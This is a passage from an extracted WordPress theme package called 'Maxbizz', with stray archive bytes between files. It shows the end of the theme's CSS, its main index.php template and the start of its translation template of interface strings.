  height: 40px;
  line-height: 40px;
  text-align: center;
  color: #fff;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.mc4wp-form-fields .subscribe-inner-form .subscribe-btn-icon i {
  display: inline-block;
}
.mc4wp-form-fields .subscribe-inner-form .subscribe-btn-icon i:before {
  font-size: 14px;
}
.mc4wp-form-fields .subscribe-inner-form .subscribe-btn-icon:hover {
  background: #fe8423;
}

/*back to top*/
#back-to-top {
  background: #fe8423;
  color: #fff;
  border: 0 none;
  cursor: pointer;
  width: 46px;
  height: 46px;
  line-height: 46px;
  opacity: 0;
  visibility: hidden;
  outline: medium none;
  position: fixed;
  right: 20px;
  bottom: 0px;
  text-align: center;
  text-decoration: none;
  transition: opacity 0.2s ease-out 0s;
  z-index: 1000;
  -webkit-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  transform: rotate(90deg);
  transition: all 0.2s linear;
  -webkit-transition: all 0.2s linear;
  -moz-transition: all 0.2s linear;
  -o-transition: all 0.2s linear;
  -ms-transition: all 0.2s linear;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
#back-to-top.show {
  opacity: 1;
  visibility: visible;
  bottom: 20px;
}
#back-to-top i:before {
  font-size: 16px;
}
#back-to-top:hover {
  bottom: 28px;
}

@media screen and (min-width: 1025px) {
  .footer-fixed .site-footer {
    width: 100%;
    position: fixed;
    bottom: 0;
    left: 0;
    z-index: -1;
  }

  .footer-fixed .site-content {
    background-color: #fff;
  }
}
/*--------------------------------------------------------------
## 404
--------------------------------------------------------------*/
.error-404 {
  position: relative;
  height: 100vh;
  display: flex;
  align-items: center;
  color: #fff;
  background: url(images/bg-404.jpg) center center no-repeat;
  background-size: cover;
}
.error-404 .error-logo {
  position: absolute;
  top: 75px;
  left: 50%;
  transform: translateX(-50%);
  width: 160px;
}
.error-404 h1 {
  font-size: 180px;
  line-height: 1;
  font-weight: 300;
  color: #fff;
}
.error-404 h2 {
  font-size: 42px;
  line-height: 1;
  margin-bottom: 30px;
  color: #fff;
}
.error-404 .page-content {
  font-size: 18px;
  line-height: 32px;
  max-width: 425px;
  margin: auto;
}
.error-404 .page-content form {
  margin: 10px 15px 0;
}
.error-404 .page-content form button {
  background: #1b1d21;
}
.error-404 .page-content form button:hover {
  background: #fe8423;
}
.error-404 .octf-btn {
  display: inline-block;
  margin-top: 30px;
}

@media (max-width: 600px) {
  .error-404 h1 {
    font-size: 120px;
  }

  .error-404 h2 {
    font-size: 28px;
  }

  .error-404 .page-content {
    font-size: 14px;
    line-height: 24px;
  }
}
/*--------------------------------------------------------------
# Responsive
--------------------------------------------------------------*/
@media (min-width: 992px) {
  .lg-hidden {
    display: none;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .md-hidden {
    display: none;
  }
}
@media (min-width: 480px) and (max-width: 767px) {
  .sm-hidden {
    display: none;
  }
}

PK�8FZ���R��	index.phpnu�[���<?php
/**
 * The main template file
 *
 * This is the most generic template file in a WordPress theme
 * and one of the two required files for a theme (the other being style.css).
 * It is used to display a page when nothing more specific matches a query.
 * E.g., it puts together the home page when no home.php file exists.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

get_header();
?>

<div class="entry-content">
	<div class="container">
		<div class="row">
			<div id="primary" class="content-area <?php maxbizz_content_columns(); ?>">
				<main id="main" class="site-main">

				<?php
				if ( have_posts() ) :

					/* Start the Loop */
					while ( have_posts() ) :
						the_post();

						/*
						 * Include the Post-Type-specific template for the content.
						 * If you want to override this in a child theme, then include a file
						 * called content-___.php (where ___ is the Post Type name) and that will be used instead.
						 */
						get_template_part( 'template-parts/content', get_post_type() );

					endwhile;

					maxbizz_posts_navigation();

				else :

					get_template_part( 'template-parts/content', 'none' );

				endif;
				?>

				</main><!-- #main -->
			</div><!-- #primary -->

			<?php get_sidebar(); ?>
		</div>
	</div>	
</div>

<?php
get_footer();PK�8FZZ�c����languages/maxbizz.potnu�[���#, fuzzy
msgid ""
msgstr ""
"Project-Id-Version: Maxbizz\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2020-12-25 08:21+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
"Language-Team: \n"
"Language: \n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Loco https://localise.biz/\n"
"X-Loco-Version: 2.5.0; wp-5.5.3\n"
"X-Domain: maxbizz"

#: inc/frontend/template-tags.php:41
msgid " "
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:85
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:94
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:103
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:109
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:118
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:127
msgid ""
"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere "
"tranquil existence, that I neglect my talents. I should be incapable of "
"drawing a single stroke at the present moment.\""
msgstr ""

#: inc/frontend/template-tags.php:105
msgid "% Comments"
msgstr ""

#. 1: list of categories.
#. 1: list of tags.
#: inc/frontend/template-tags.php:45 inc/frontend/template-tags.php:99
#: inc/frontend/template-tags.php:111 inc/frontend/template-tags.php:134
#, php-format
msgid "%1$s"
msgstr ""

#: inc/frontend/template-tags.php:204
#, php-format
msgid "%s"
msgstr ""

#: inc/frontend/template-tags.php:96
msgid ", "
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:79
msgid "0"
msgstr ""

#: inc/frontend/template-tags.php:105
msgid "0 Comments"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:67
#: inc/backend/elementor/widgets/features-service.php:106
#: inc/backend/elementor/widgets/flip-box.php:65
msgid "01"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:112
msgid "02"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:72
msgid "1"
msgstr ""

#: inc/frontend/template-tags.php:105
msgid "1 Comment"
msgstr ""

#: inc/backend/elementor/widgets/counter-icon.php:90
#: inc/backend/elementor/widgets/counter.php:105
msgid "180"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:73
msgid "2"
msgstr ""

#: inc/backend/customizer/customizer.php:677
#: inc/backend/elementor/widgets/portfolio-filter.php:122
msgid "2 Column"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:70
msgid "2020-10-22 12:00"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:74
msgid "3"
msgstr ""

#: inc/backend/customizer/customizer.php:678
#: inc/backend/elementor/widgets/portfolio-filter.php:123
msgid "3 Column"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:75
msgid "4"
msgstr ""

#: inc/backend/customizer/customizer.php:679
#: inc/backend/elementor/widgets/portfolio-filter.php:124
msgid "4 Column"
msgstr ""

#: inc/frontend/builder.php:91 inc/backend/customizer/customizer.php:267
#: inc/frontend/page-header/breadcrumbs.php:89
msgid "404"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:125
msgid "5 Column"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:92
msgid "<i class=\"ot-flaticon-trajectory\"></i> Explore More"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:132
msgid "<i class=\"ot-flaticon-trajectory\"></i> Learn More"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:67
msgid "<sup>$</sup> 29"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:96
msgid ""
"<ul><li class=\"active\">Structure of a project</li><li class=\"active\">"
"Measurement of the room</li><li>3D-Visualization of premises</li></ul>"
msgstr ""

#: inc/frontend/widgets/author-widget.php:14
msgid "A Author Widget"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:86
#: inc/backend/elementor/widgets/features-service.php:108
#: inc/backend/elementor/widgets/features-service.php:114
msgid ""
"Accelerate your innovation and transformation with a fully integrated suite "
"of capabilities that puts digital at the heart of everything you do."
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:72
msgid "Accordion #1"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:76
msgid "Accordion #2"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:57
#: inc/backend/elementor/widgets/accordions.php:58
msgid "Accordion Content"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:67
msgid "Accordion Items"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:47
#: inc/backend/elementor/widgets/accordions.php:48
msgid "Accordion Title"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:36
msgid "Accordions"
msgstr ""

#: inc/backend/plugin-requires.php:79
msgid "Activate installed plugin"
msgid_plural "Activate installed plugins"
msgstr[0] ""
msgstr[1] ""

#: inc/backend/elementor/widgets/portfolio-filter.php:285
#: inc/backend/elementor/widgets/pricing-table.php:412
msgid "Active Color"
msgstr ""

#: inc/backend/elementor/widgets/tab-titles.php:190
#: inc/backend/elementor/widgets/tabs.php:187
msgid "Active/Hover"
msgstr ""

#: functions.php:101
msgid "Add widgets here."
msgstr ""

#: inc/backend/elementor/widgets/counter-icon.php:97
#: inc/backend/elementor/widgets/counter.php:112
msgid "After Number:"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:65
msgid "After Submit Redirect Setting"
msgstr ""

#: inc/backend/elementor/widgets/button.php:63
#: inc/backend/elementor/widgets/countdown.php:42
#: inc/backend/elementor/widgets/counter-icon.php:41
#: inc/backend/elementor/widgets/counter.php:65
#: inc/backend/elementor/widgets/heading.php:97
#: inc/backend/elementor/widgets/icon-box-1.php:43
#: inc/backend/elementor/widgets/icon-box-grid.php:43
#: inc/backend/elementor/widgets/image-box-carousel.php:42
#: inc/backend/elementor/widgets/image-box.php:42
#: inc/backend/elementor/widgets/portfolio-filter.php:233
#: inc/backend/elementor/widgets/portfolio-filter.php:680
#: inc/backend/elementor/widgets/progress-bars.php:83
#: inc/backend/elementor/widgets/switcher.php:41
#: inc/backend/elementor/widgets/tab-titles.php:71
#: inc/backend/elementor/widgets/team-1.php:177
#: inc/backend/elementor/widgets/team-2.php:215
#: inc/backend/elementor/widgets/team-3.php:321
#: inc/backend/elementor/widgets/team-carousel.php:342
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:41
#: inc/backend/elementor/widgets/video-button.php:43
#: inc/backend/elementor/widgets/header/logo.php:42
#: inc/backend/elementor/widgets/header/menu.php:55
msgid "Alignment"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:194
#: inc/backend/elementor/widgets/portfolio-filter.php:346
msgid "Alignment Info"
msgstr ""

#: archive-ot_portfolio.php:19
msgid "All"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:47
#: inc/backend/elementor/widgets/portfolio-filter.php:60
#: inc/backend/elementor/widgets/post-carousel.php:47
msgid "All Categories"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:118
msgid "All Input CSS"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:106
msgid "All Label CSS"
msgstr ""

#: inc/backend/plugin-requires.php:82
#, php-format
msgid "All plugins installed and activated successfully. %s"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:79
msgid "All Text"
msgstr ""

#: inc/backend/elementor/widgets/image-box.php:117
msgid ""
"Analysis of the market as a whole and its particular components (competitors,"
" consumers, product, etc.)"
msgstr ""

#: inc/backend/elementor/widgets/video-button.php:86
msgid "Animation"
msgstr ""

#: inc/backend/elementor/widgets/video-button.php:186
#: inc/backend/elementor/widgets/video-button.php:244
msgid "Animation Color"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:240
#: inc/backend/elementor/widgets/portfolio-filter.php:443
msgid "Animation Image Hover"
msgstr ""

#: inc/backend/customizer/customizer.php:247
msgid "Archive Page"
msgstr ""

#: inc/backend/customizer/customizer.php:651
msgid "Archive page custom"
msgstr ""

#: inc/backend/customizer/customizer.php:650
msgid "Archive page default"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:120
msgid "Arrow Color"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:149
#: inc/backend/elementor/widgets/client-logos.php:377
#: inc/backend/elementor/widgets/image-box-carousel.php:211
#: inc/backend/elementor/widgets/image-box-carousel.php:567
#: inc/backend/elementor/widgets/portfolio-carousel.php:140
#: inc/backend/elementor/widgets/portfolio-carousel.php:408
#: inc/backend/elementor/widgets/post-carousel.php:148
#: inc/backend/elementor/widgets/post-carousel.php:481
#: inc/backend/elementor/widgets/team-carousel.php:256
#: inc/backend/elementor/widgets/team-carousel.php:644
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:178
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:504
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:188
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:487
msgid "Arrows"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-2.php:200
msgid "Arrows Align"
msgstr ""

#: inc/backend/meta-boxes.php:42
msgid "Audio"
msgstr ""

#: inc/frontend/template-tags.php:369 inc/backend/customizer/customizer.php:565
msgid "Author"
msgstr ""

#: inc/backend/customizer/customizer.php:622
msgid "Author Info Box"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:117
#: inc/backend/elementor/widgets/image-box-carousel.php:179
#: inc/backend/elementor/widgets/portfolio-carousel.php:108
#: inc/backend/elementor/widgets/post-carousel.php:116
#: inc/backend/elementor/widgets/team-carousel.php:224
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:146
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:156
msgid "Autoplay"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:129
#: inc/backend/elementor/widgets/image-box-carousel.php:191
#: inc/backend/elementor/widgets/portfolio-carousel.php:120
#: inc/backend/elementor/widgets/post-carousel.php:128
#: inc/backend/elementor/widgets/team-carousel.php:236
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:158
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:168
msgid "Autoplay Timeout"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:42
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:66
msgid "Avatar:"
msgstr ""

#: inc/backend/elementor/widgets/header/menu-mobile.php:156
msgid "Back Button Color"
msgstr ""

#: inc/backend/customizer/customizer.php:779
msgid "Back To Top On/Off?"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:98
#: inc/backend/elementor/widgets/accordions.php:181
#: inc/backend/elementor/widgets/client-logos.php:409
#: inc/backend/elementor/widgets/flip-box.php:249
#: inc/backend/elementor/widgets/icon-box-1.php:462
#: inc/backend/elementor/widgets/icon-box-grid.php:187
#: inc/backend/elementor/widgets/image-box-carousel.php:269
#: inc/backend/elementor/widgets/image-box-carousel.php:622
#: inc/backend/elementor/widgets/image-box.php:168
#: inc/backend/elementor/widgets/message-box.php:85
#: inc/backend/elementor/widgets/message-box.php:142
#: inc/backend/elementor/widgets/portfolio-carousel.php:440
#: inc/backend/elementor/widgets/portfolio-filter.php:512
#: inc/backend/elementor/widgets/post-carousel.php:213
#: inc/backend/elementor/widgets/post-carousel.php:349
#: inc/backend/elementor/widgets/post-carousel.php:406
#: inc/backend/elementor/widgets/post-carousel.php:536
#: inc/backend/elementor/widgets/pricing-table.php:156
#: inc/backend/elementor/widgets/pricing-table.php:229
#: inc/backend/elementor/widgets/progress-bars.php:122
#: inc/backend/elementor/widgets/progress-bars.php:319
#: inc/backend/elementor/widgets/switcher.php:151
#: inc/backend/elementor/widgets/tab-titles.php:176
#: inc/backend/elementor/widgets/tab-titles.php:208
#: inc/backend/elementor/widgets/tabs.php:154
#: inc/backend/elementor/widgets/tabs.php:194
#: inc/backend/elementor/widgets/team-1.php:492
#: inc/backend/elementor/widgets/team-2.php:250
#: inc/backend/elementor/widgets/team-2.php:426
#: inc/backend/elementor/widgets/team-3.php:207
#: inc/backend/elementor/widgets/team-3.php:503
#: inc/backend/elementor/widgets/team-carousel.php:377
#: inc/backend/elementor/widgets/team-carousel.php:553
#: inc/backend/elementor/widgets/team-carousel.php:699
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:559
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:542
#: inc/backend/elementor/widgets/header/menu-mobile.php:116
#: inc/backend/elementor/widgets/header/side-panel.php:97
msgid "Background"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:109
msgid "Background Active"
msgstr ""

#: inc/backend/customizer/customizer.php:1017
msgid "Background Body"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:197
#: inc/backend/elementor/widgets/icon-box-1.php:233
#: inc/backend/elementor/widgets/icon-box-2.php:260
#: inc/backend/elementor/widgets/icon-box-2.php:342
#: inc/backend/elementor/widgets/team-1.php:232
#: inc/backend/elementor/widgets/team-1.php:259
msgid "Background Box"
msgstr ""

#: inc/backend/elementor/widgets/header/side-panel.php:108
msgid "Background Close Button"
msgstr ""

#: inc/frontend/preloader.php:102 inc/backend/customizer/customizer.php:396
#: inc/backend/customizer/customizer.php:786
#: inc/backend/elementor/widgets/button.php:182
#: inc/backend/elementor/widgets/button.php:221
#: inc/backend/elementor/widgets/features-service.php:390
#: inc/backend/elementor/widgets/features-service.php:443
#: inc/backend/elementor/widgets/image-box-carousel.php:426
#: inc/backend/elementor/widgets/image-box-carousel.php:479
#: inc/backend/elementor/widgets/image-box.php:327
#: inc/backend/elementor/widgets/image-box.php:380
#: inc/backend/elementor/widgets/portfolio-filter.php:743
#: inc/backend/elementor/widgets/portfolio-filter.php:774
#: inc/backend/elementor/widgets/pricing-table.php:477
#: inc/backend/elementor/widgets/pricing-table.php:530
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:223
#: inc/backend/elementor/widgets/video-button.php:175
#: inc/backend/elementor/widgets/video-button.php:233
#: inc/backend/elementor/widgets/header/menu.php:197
#: inc/backend/elementor/widgets/header/search.php:96
#: inc/backend/elementor/widgets/header/search.php:174
msgid "Background Color"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:191
msgid "Background color"
msgstr ""

#: inc/backend/elementor/widgets/header/cart.php:70
msgid "Background Count"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:420
#: inc/backend/elementor/widgets/image-box-carousel.php:644
#: inc/backend/elementor/widgets/portfolio-carousel.php:451
#: inc/backend/elementor/widgets/post-carousel.php:558
#: inc/backend/elementor/widgets/team-1.php:514
#: inc/backend/elementor/widgets/team-2.php:449
#: inc/backend/elementor/widgets/team-3.php:526
#: inc/backend/elementor/widgets/team-carousel.php:576
#: inc/backend/elementor/widgets/team-carousel.php:721
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:581
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:564
msgid "Background Hover"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:238
msgid "Background Hover Color"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:265
#: inc/backend/elementor/widgets/icon-box-2.php:221
#: inc/backend/elementor/widgets/icon-box-2.php:305
msgid "Background Icon"
msgstr ""

#: inc/backend/customizer/customizer.php:376
msgid "Background Image"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:415
msgid "Background Info"
msgstr ""

#: inc/backend/customizer/customizer.php:697
#: inc/backend/elementor/widgets/portfolio-filter.php:196
#: inc/backend/elementor/widgets/portfolio-filter.php:401
#: inc/backend/elementor/widgets/team-3.php:282
msgid "Background Overlay"
msgstr ""

#: inc/backend/meta-boxes.php:127 inc/backend/meta-boxes.php:217
msgid "Background Page Header"
msgstr ""

#: inc/backend/elementor/elementor.php:182
msgid "Background Scroll"
msgstr ""

#: inc/backend/customizer/customizer.php:698
#: inc/backend/elementor/widgets/portfolio-filter.php:197
msgid "Background Solid"
msgstr ""

#: inc/backend/meta-boxes.php:60
msgid "Background Video"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:421
#: inc/backend/elementor/widgets/icon-box-2.php:415
msgid "Background Width"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:43
msgid "Bar Style"
msgstr ""

#: inc/backend/plugin-requires.php:78
msgid "Begin installing plugin"
msgid_plural "Begin installing plugins"
msgstr[0] ""
msgstr[1] ""

#: inc/backend/customizer/customizer.php:198
msgid "Blog"
msgstr ""

#: inc/backend/customizer/customizer.php:547
msgid "Blog Layout"
msgstr ""

#: inc/backend/customizer/customizer.php:226
msgid "Blog Page"
msgstr ""

#: inc/backend/customizer/customizer.php:587
msgid "Blog Single"
msgstr ""

#: inc/backend/customizer/customizer.php:862
msgid "Body Font 1"
msgstr ""

#: inc/backend/customizer/customizer.php:881
msgid "Body Font 2"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:327
#: inc/backend/elementor/widgets/icon-box-1.php:379
#: inc/backend/elementor/widgets/icon-box-1.php:482
msgid "Border Circle"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:120
#: inc/backend/elementor/widgets/button.php:231
#: inc/backend/elementor/widgets/features-service.php:400
#: inc/backend/elementor/widgets/features-service.php:453
#: inc/backend/elementor/widgets/heading.php:205
#: inc/backend/elementor/widgets/icon-box-1.php:339
#: inc/backend/elementor/widgets/icon-box-1.php:493
#: inc/backend/elementor/widgets/icon-box-grid.php:197
#: inc/backend/elementor/widgets/image-box-carousel.php:454
#: inc/backend/elementor/widgets/image-box.php:355
#: inc/backend/elementor/widgets/pricing-table.php:505
#: inc/backend/elementor/widgets/pricing-table.php:558
#: inc/backend/elementor/widgets/tabs.php:217
#: inc/backend/elementor/widgets/video-button.php:163
#: inc/backend/elementor/widgets/video-button.php:222
#: inc/backend/elementor/widgets/header/menu-mobile.php:138
#: inc/backend/elementor/widgets/header/menu.php:249
#: inc/backend/elementor/widgets/header/search.php:144
msgid "Border Color"
msgstr ""

#: inc/backend/elementor/widgets/button.php:141
#: inc/backend/elementor/widgets/client-logos.php:431
#: inc/backend/elementor/widgets/flip-box.php:142
#: inc/backend/elementor/widgets/icon-box-1.php:439
#: inc/backend/elementor/widgets/icon-box-2.php:434
#: inc/backend/elementor/widgets/icon-box-grid.php:207
#: inc/backend/elementor/widgets/image-box-carousel.php:291
#: inc/backend/elementor/widgets/image-box-carousel.php:655
#: inc/backend/elementor/widgets/image-box.php:190
#: inc/backend/elementor/widgets/message-box.php:96
#: inc/backend/elementor/widgets/portfolio-carousel.php:462
#: inc/backend/elementor/widgets/post-carousel.php:202
#: inc/backend/elementor/widgets/post-carousel.php:569
#: inc/backend/elementor/widgets/pricing-table.php:145
#: inc/backend/elementor/widgets/progress-bars.php:225
#: inc/backend/elementor/widgets/tab-titles.php:136
#: inc/backend/elementor/widgets/team-1.php:213
#: inc/backend/elementor/widgets/team-1.php:469
#: inc/backend/elementor/widgets/team-2.php:178
#: inc/backend/elementor/widgets/team-2.php:402
#: inc/backend/elementor/widgets/team-3.php:196
#: inc/backend/elementor/widgets/team-3.php:262
#: inc/backend/elementor/widgets/team-3.php:479
#: inc/backend/elementor/widgets/team-carousel.php:305
#: inc/backend/elementor/widgets/team-carousel.php:529
#: inc/backend/elementor/widgets/team-carousel.php:732
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:281
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:337
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:592
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:319
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:575
#: inc/backend/elementor/widgets/header/menu.php:177
#: inc/backend/elementor/widgets/header/search.php:107
msgid "Border Radius"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:229
#: inc/backend/elementor/widgets/portfolio-filter.php:454
msgid "Border Radius Image"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:197
#: inc/backend/elementor/widgets/portfolio-filter.php:386
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:204
msgid "Bottom"
msgstr ""

#: inc/backend/customizer/customizer.php:835
msgid "Bottom (Ex: 20px)"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:154
#: inc/backend/elementor/widgets/icon-box-2.php:149
msgid "Bottom Line"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:501
msgid "Bottom Spacing"
msgstr ""

#: inc/backend/elementor/widgets/message-box.php:77
msgid "Box"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:42
msgid "Box Style"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:180
msgid "Boxes"
msgstr ""

#: inc/woocommerce/woocommerce.php:100
msgctxt "breadcrumb"
msgid "Home"
msgstr ""

#: inc/backend/customizer/customizer.php:434
msgid "Breadcrumbs Color"
msgstr ""

#: inc/backend/customizer/customizer.php:357
msgid "Breadcrumbs On Left"
msgstr ""

#: inc/backend/customizer/customizer.php:343
msgid "Breadcrumbs On/Off"
msgstr ""

#: inc/backend/elementor/widgets/button.php:56
#: inc/backend/elementor/widgets/features-service.php:48
#: inc/backend/elementor/widgets/features-service.php:360
#: inc/backend/elementor/widgets/flip-box.php:290
#: inc/backend/elementor/widgets/icon-box-1.php:627
#: inc/backend/elementor/widgets/image-box-carousel.php:394
#: inc/backend/elementor/widgets/image-box.php:296
#: inc/backend/elementor/widgets/pricing-table.php:443
#: inc/backend/elementor/widgets/video-button.php:36
#: inc/backend/elementor/widgets/video-button.php:101
#: inc/backend/elementor/widgets/header/search.php:155
msgid "Button"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:312
#: inc/backend/elementor/widgets/portfolio-filter.php:274
msgid "Button Color"
msgstr ""

#: inc/backend/elementor/widgets/video-button.php:78
#: inc/backend/elementor/widgets/video-button.php:265
msgid "Caption"
msgstr ""

#: inc/backend/meta-boxes.php:233
msgid "Carousel Image"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:308
#: inc/backend/elementor/widgets/portfolio-filter.php:599
#: inc/backend/elementor/widgets/post-carousel.php:316
msgid "Category"
msgstr ""

#: inc/backend/elementor/widgets/button.php:71
#: inc/backend/elementor/widgets/client-logos.php:193
#: inc/backend/elementor/widgets/countdown.php:50
#: inc/backend/elementor/widgets/counter-icon.php:49
#: inc/backend/elementor/widgets/counter.php:74
#: inc/backend/elementor/widgets/heading.php:105
#: inc/backend/elementor/widgets/icon-box-1.php:51
#: inc/backend/elementor/widgets/icon-box-grid.php:51
#: inc/backend/elementor/widgets/image-box-carousel.php:50
#: inc/backend/elementor/widgets/image-box.php:50
#: inc/backend/elementor/widgets/portfolio-carousel.php:202
#: inc/backend/elementor/widgets/portfolio-filter.php:241
#: inc/backend/elementor/widgets/portfolio-filter.php:354
#: inc/backend/elementor/widgets/portfolio-filter.php:688
#: inc/backend/elementor/widgets/progress-bars.php:91
#: inc/backend/elementor/widgets/switcher.php:49
#: inc/backend/elementor/widgets/tab-titles.php:79
#: inc/backend/elementor/widgets/team-1.php:185
#: inc/backend/elementor/widgets/team-2.php:223
#: inc/backend/elementor/widgets/team-3.php:329
#: inc/backend/elementor/widgets/team-carousel.php:350
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:49
#: inc/backend/elementor/widgets/video-button.php:51
#: inc/backend/elementor/widgets/header/logo.php:50
#: inc/backend/elementor/widgets/header/menu.php:63
msgid "Center"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-carousel.php:84
msgid "Center Mode"
msgstr ""

#: inc/backend/customizer/customizer.php:714
msgid "Change Posts Per Page for Portfolio Archive, Taxonomy."
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:107
#: inc/backend/elementor/widgets/contact-form7.php:119
#: inc/backend/elementor/widgets/contact-form7.php:135
#: inc/backend/elementor/widgets/contact-form7.php:207
msgid ""
"Changes might not sometimes show in the live preview but check in the front "
"end to see the changes."
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:149
msgid "Checkbox/ Radio CSS"
msgstr ""

#. Name of the template
msgid "Checkout & Cart Page"
msgstr ""

#: inc/backend/customizer/customizer.php:657
msgid "Choose a custom page for archive portfolio page."
msgstr ""

#: inc/backend/customizer/customizer.php:1007
msgid "Choose a custom page for page 404."
msgstr ""

#: inc/backend/customizer/customizer.php:756
msgid "Choose a footer for all site here."
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:105
msgid "Choose Plane"
msgstr ""

#: inc/backend/customizer/customizer.php:291
msgid "Choose the header on desktop."
msgstr ""

#: inc/backend/customizer/customizer.php:309
msgid "Choose the header on mobile."
msgstr ""

#: inc/backend/customizer/customizer.php:319
msgid "Choose the side panel on header."
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:163
msgid "Circle Width"
msgstr ""

#: inc/backend/elementor/widgets/button.php:100
msgid "Click here"
msgstr ""

#: inc/backend/elementor/widgets/flip-box.php:74
msgid "Client Learning Programs"
msgstr ""

#: inc/backend/elementor/widgets/team-1.php:74
#: inc/backend/elementor/widgets/team-2.php:74
#: inc/backend/elementor/widgets/team-3.php:74
msgid "co-founder of company"
msgstr ""

#: inc/backend/customizer/customizer.php:1039
msgid "Code"
msgstr ""

#: inc/backend/customizer/customizer.php:806
#: inc/backend/elementor/widgets/accordions.php:131
#: inc/backend/elementor/widgets/accordions.php:192
#: inc/backend/elementor/widgets/client-logos.php:352
